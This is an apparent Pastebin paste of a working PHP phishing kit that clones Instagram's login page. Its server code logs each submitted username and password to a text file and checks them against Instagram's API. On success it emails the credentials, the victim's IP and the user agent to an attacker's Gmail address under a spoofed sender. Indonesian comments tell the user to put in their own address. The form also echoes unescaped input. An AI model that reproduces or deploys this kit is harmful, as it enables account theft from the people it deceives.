Advertisement
Guest User

script

a guest
Jan 25th, 2017
481
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. if(isset($_POST['login'])){
  3. ini_set('display_errors', 0);
  4.  
  5. $bikintxt = "tes.txt";
  6. $user = $_POST['username'];
  7. $pass = $_POST['password'];
  8.  
  9. $handle = fopen($bikintxt, 'a');
  10. fwrite($handle, "[./Cyb3rPr0] => $user : $pass | Ip: $ip_korban | Tanggal: $date ");
  11. fwrite($handle, "\n");
  12. fclose($handle);
  13.  
  14. if(empty($user) && empty($pass)){
  15. $msg_a ='';
  16. $msg_b ='    <ul class="errorlist"><li>This field is required.</li></ul>';
  17. }
  18. require_once('function.class.php');
  19. $useragent = generate_useragent();
  20. $device_id = generate_device_id();
  21. $login = proccess(1, $useragent, 'accounts/login/', 0, hook('{"device_id":"'.$device_id.'","guid":"'.generate_guid().'","username":"'.trim($user).'","password":"'.trim($pass).'","Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"}'), array('Accept-Language: id-ID, en-US', 'X-IG-Connection-Type: WIFI'));
  22. $log = json_decode($login[1]);
  23. if($log->status<>ok){
  24. $msg_a ='
  25. <div id="alerts" class="alerts">
  26.     <p class="alert-red">Please enter a correct username and password. Note that both fields are case-sensitive.</p>
  27. </div>';
  28. $msg_b ='    <ul class="errorlist"><li>Please enter a correct username and password. Note that both fields are case-sensitive.</li></ul>';
  29. } else {
  30. $ip_korban = $_SERVER['REMOTE_ADDR'];
  31. $uag = $_SERVER['HTTP_USER_AGENT'];
  32. $date = date('d/M/Y');
  33. $hasil_log = '
  34. <b style="color:green;">==== [ Instagram ] ====</b><br>
  35. <font color="gray">
  36. Username: '.$user.'<br>
  37. Password: '.$pass.'<br>
  38. Status: Login Berhasil!<br>
  39. Tanggal: '.$date.'<br>
  40. IP Address: '.$ip_korban.'<br>
  41. User Agent: '.$uag.'<br>
  42. </font>
  43. <b style="color:green;">==== [ Instagram ] ====</b><br>
  44. ';
  45. $headers .= "X-Mailer: PHP/" . phpversion();
  46. $cup_body = " $hasil_log \n"; //isi dari email yang dikirim ke email mu
  47. $cup_to = "instagramsuppoort.mail@gmail.com"; // email mu
  48. $cup_headers = "MIME-Version: 1.0" . "\n";
  49. $cup_headers .= "Content-type: text/html; charset=UTF-8" . "\n";
  50. $cup_headers .= "From: no-reply@amazon-problem.tk \n"; //email pengirim ( modif aja sesuka loe )
  51. $cup_headers .= "X-Mailer: PHP/" . phpversion();
  52. $cup_subject = "Result Instagram | from $ip_korban "; //subject email yang akan dikirim ke emailmu ( modif sesuka loe )
  53. @mail($cup_to, $cup_subject, $cup_body, $cup_headers); //perintah buat ngirim email
  54. header('location:/sucsess.php');
  55. }
  56. }
  57. ?>
  58.  
  59.  
  60. <!DOCTYPE html>
  61. <!--[if lt IE 7]>      <html lang="en" class="no-js lt-ie9 lt-ie8 lt-ie7 not-logged-in "> <![endif]-->
  62. <!--[if IE 7]>         <html lang="en" class="no-js lt-ie9 lt-ie8 not-logged-in "> <![endif]-->
  63. <!--[if IE 8]>         <html lang="en" class="no-js lt-ie9 not-logged-in "> <![endif]-->
  64. <!--[if gt IE 8]><!--> <html lang="en" class="no-js not-logged-in "> <!--<![endif]-->
  65.     <head>
  66.     <script type="text/javascript">window._timings = {"domLoading": Date.now()}</script>
  67.         <meta charset="utf-8">
  68.         <meta http-equiv="X-UA-Compatible" content="IE=edge">
  69.         <title>Log in &mdash; Instagram</title>
  70.         <script type="text/javascript">
  71.   WebFontConfig = {
  72.     custom: {
  73.       families: ['proxima-nova:n3,n4,n6,n7'],
  74.     }
  75.   };
  76. </script>
  77. <script src="//instagramstatic-a.akamaihd.net/h1/scripts/webfont.js/c0456c81549b.js" type="text/javascript" async></script>
  78. <style type="text/css">
  79.   @font-face {
  80.     font-family: 'proxima-nova';
  81.     src: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-bold-webfont.eot/115b1f7f9c04.eot');
  82.     src: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-bold-webfont.eot/115b1f7f9c04.eot?#iefix') format("embedded-opentype"),
  83.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-bold-webfont.woff/618250d25a4d.woff') format("woff"),
  84.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-bold-webfont.ttf/646346e03084.ttf') format("truetype"),
  85.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-bold-webfont.svg/e55a9d6051e8.svg#ProximaNovaBold') format("svg");
  86.     font-weight: bold;
  87.     font-style: normal; }
  88.  
  89.   @font-face {
  90.     font-family: 'proxima-nova';
  91.     src: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-boldit-webfont.eot/1cbb869da891.eot');
  92.     src: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-boldit-webfont.eot/1cbb869da891.eot?#iefix') format("embedded-opentype"),
  93.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-boldit-webfont.woff/b1cf049474c9.woff') format("woff"),
  94.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-boldit-webfont.ttf/3adb020ceae3.ttf') format("truetype"),
  95.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-boldit-webfont.svg/29948a2d3c58.svg#ProximaNovaBoldItalic') format("svg");
  96.     font-weight: bold;
  97.     font-style: italic; }
  98.  
  99.   @font-face {
  100.     font-family: 'proxima-nova';
  101.     src: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-reg-webfont.eot/12af77715cee.eot');
  102.     src: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-reg-webfont.eot/12af77715cee.eot?#iefix') format("embedded-opentype"),
  103.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-reg-webfont.woff/a9a9773b8e29.woff') format("woff"),
  104.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-reg-webfont.ttf/99e19808976a.ttf') format("truetype"),
  105.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-reg-webfont.svg/c33d2fd56309.svg#ProximaNovaRegular') format("svg");
  106.     font-weight: normal;
  107.     font-style: normal; }
  108.  
  109.   @font-face {
  110.     font-family: 'proxima-nova';
  111.     src: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-regit-webfont.eot/1bbbd1312b0d.eot');
  112.     src: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-regit-webfont.eot/1bbbd1312b0d.eot?#iefix') format("embedded-opentype"),
  113.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-regit-webfont.woff/9e306befca91.woff') format("woff"),
  114.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-regit-webfont.ttf/4a8663684135.ttf') format("truetype"),
  115.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-regit-webfont.svg/876278d4b189.svg#ProximaNovaRegularItalic') format("svg");
  116.     font-weight: normal;
  117.     font-style: italic; }
  118.  
  119.   @font-face {
  120.     font-family: 'proxima-nova';
  121.     src: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-sbold-webfont.eot/5016edf79e1d.eot');
  122.     src: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-sbold-webfont.eot/5016edf79e1d.eot?#iefix') format("embedded-opentype"),
  123.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-sbold-webfont.woff/615c1b06d8fa.woff') format("woff"),
  124.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-sbold-webfont.ttf/2973bd483f7a.ttf') format("truetype"),
  125.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-sbold-webfont.svg/868597833e49.svg#ProximaNovaSemibold') format("svg");
  126.     font-weight: 600;
  127.     font-style: normal; }
  128. </style>
  129.   <style type="text/css">
  130.   @font-face {
  131.     font-family: 'proxima-nova';
  132.     src: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-light-webfont.eot/63c84728610f.eot');
  133.     src: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-light-webfont.eot/63c84728610f.eot?#iefix') format("embedded-opentype"),
  134.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-light-webfont.woff/66bbe029f180.woff') format("woff"),
  135.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-light-webfont.ttf/eb408516399b.ttf') format("truetype"),
  136.       url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-light-webfont.svg/858f6a9b7ef3.svg#ProximaNovaLight') format("svg");
  137.     font-weight: 300;
  138.     font-style: normal; }
  139. </style>
  140.         <meta name="robots" content="noimageindex">
  141.     <meta name="apple-mobile-web-app-capable" content="yes">
  142.     <meta name="apple-mobile-web-app-status-bar-style" content="black">
  143.     <meta id="viewport" name="viewport" content="width=device-width, user-scalable=no, initial-scale=1, minimum-scale=1, maximum-scale=1">
  144.         <script type="text/javascript">
  145.         (function() {
  146.             var docElement = document.documentElement;
  147.             var classRE = new RegExp('(^|\\s)no-js(\\s|$)');
  148.             var className = docElement.className;
  149.             docElement.className = className.replace(classRE, '$1js$2');
  150.         })();
  151.         </script>
  152.         <link rel="Shortcut Icon" type="image/x-icon" href="//instagramstatic-a.akamaihd.net/h1/images/ico/favicon.ico/7cdab0872b15.ico"><link rel="mask-icon" href="//instagramstatic-a.akamaihd.net/h1/images/ico/favicon.svg/dfde15ef1533.svg" color="#125688">
  153.         <link rel="apple-touch-icon-precomposed" href="//instagramstatic-a.akamaihd.net/h1/images/ico/apple-touch-icon-precomposed.png/29d68fc587d7.png">
  154.         <link rel="apple-touch-icon-precomposed" sizes="72x72" href="//instagramstatic-a.akamaihd.net/h1/images/ico/apple-touch-icon-72x72-precomposed.png/3f5e04d85488.png">
  155.         <link rel="apple-touch-icon-precomposed" sizes="114x114" href="//instagramstatic-a.akamaihd.net/h1/images/ico/apple-touch-icon-114x114-precomposed.png/29d68fc587d7.png">
  156.         <link rel="apple-touch-icon-precomposed" sizes="144x144" href="//instagramstatic-a.akamaihd.net/h1/images/ico/apple-touch-icon-144x144-precomposed.png/52fcc0fc09e4.png">
  157.     <link href="//instagramstatic-a.akamaihd.net/h1/styles/distillery/dialog-main.css/aaf7a1937bef.css" type="text/css" rel="stylesheet"></link>
  158.     <!--[if lt IE 9]>
  159.    <style>
  160.        .dialog-outer {
  161.            min-height: 0;
  162.        }
  163.    </style>
  164.    <![endif]-->
  165. <script src="//instagramstatic-a.akamaihd.net/h1/scripts/jquery.js/213ba890e802.js" type="text/javascript"></script>
  166. <script src="//instagramstatic-a.akamaihd.net/h1/scripts/bluebar.js/57733d51aed5.js" type="text/javascript"></script>
  167. <script type="text/javascript">
  168.     $(document).ready(function() {
  169.         $("#id_username").focus();
  170.     });
  171. </script>
  172.     </head>
  173.     <body class="p-dialog oauth-login">
  174.         <div class="root">
  175. <section class="dialog-outer">
  176.     <div class="dialog">
  177.         <header>
  178.             <h1 class="logo">Instagram</h1>
  179.         </header>
  180.         <div class="dialog-main">
  181. <?php if(isset($_POST['login'])){ echo $msg_a; } ?>
  182. <form method="POST" id="login-form" class="adjacent" action="?">
  183.     <input type="hidden" name="csrfmiddlewaretoken" value="142986590bde899b1c42a35f37b7d0ba"/>
  184. <?php if(isset($_POST['login'])){ echo $msg_b; } ?>
  185. <p><label for="id_username">Username:</label> <input name="username" maxlength="30" autocapitalize="off" autocorrect="off" type="text" id="id_username" value="<?php echo $_POST['username']; ?>" /></p>
  186. <p><label for="id_password">Password:</label> <input autocapitalize="off" autocorrect="off" type="password" name="password" id="id_password" value="" /></p>
  187.     <p class="form-actions">
  188.         <a href="https://www.instagram.com/accounts/password/reset/">Forgot password?</a>
  189.         <input type="submit" name="login" class="button-green" value="Log in" />
  190.     </p>
  191. </form>
  192.  
  193. <script>
  194.     $(window).load(
  195.         function() {
  196.             $("#id_username").focus();
  197.         }
  198.     );
  199. </script>
  200.         </div>
  201.     </div>
  202. </section>
  203.         <div id="reactModalMountPoint"></div>
  204.     </div> <!-- .root -->
  205.     </body>
  206. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement